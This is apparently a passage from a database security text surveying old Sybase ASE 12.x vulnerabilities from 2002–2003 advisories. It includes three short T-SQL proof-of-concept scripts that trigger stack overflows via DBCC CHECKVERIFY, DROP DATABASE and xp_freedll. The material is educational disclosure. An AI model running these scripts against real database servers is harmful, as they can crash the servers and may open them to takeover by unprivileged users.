Various security flaws have previously been discovered in Sybase. We list a few of them here.
In 2003, Rapid7 published an advisory relating to an overflow in the Sybase ASE 12.5 authentication handling code. They reported that they were able to trigger a heap overflow by specifying invalid lengths for the fields in login requests , although a correct username and password was required for the attack to work. The documented impact was a denial of service, but a great deal has been written about heap overflow exploitation since that was not known at the time, and it is possible (in fact, probable) that the issue is in fact exploitable.
In 2002, Application Security Inc. published an advisory relating to an exploitable stack overflow in the DBCC CHECKVERIFY command of Adaptive Server Enterprise 12.5. This command can be executed by a non-privileged user , and was therefore in the same category as the NGS bugs previously described.
You can find further information at
http://www.securityfocus.com/bid/6269
Here is a sample script that demonstrates the vulnerability:
declare @s varchar(16384) select @s = replicate('A', 16384) DBCC CHECKVERIFY(@s)
In 2002, Application Security Inc. published an advisory relating to an exploitable stack overflow in the DROP DATABASE command, in ASE 12.5. Further information is available at
http://www.securityfocus.com/bid/6267
And, again, here is a script that demonstrates the vulnerability:
declare @s varchar(16384) select @s = replicate('A', 16384) DROP DATABASE @s
In 2002, Application Security Inc. published an advisory on an exploitable stack overflow in the xp_freedll extended stored procedure in Sybase ASE 12.0 and 12.5. By default this extended stored procedure is accessible to all users, so the overflow would allow an unprivileged user to take full control of the database server. More info is available at
http://www.securityfocus.com/bid/6266
This script reproduces the bug:
declare @s1 varchar(10000) set @s1 = @s1 + replicate('x',300) set @s1 = @s1 + '.dll' exec xp_freedll @s1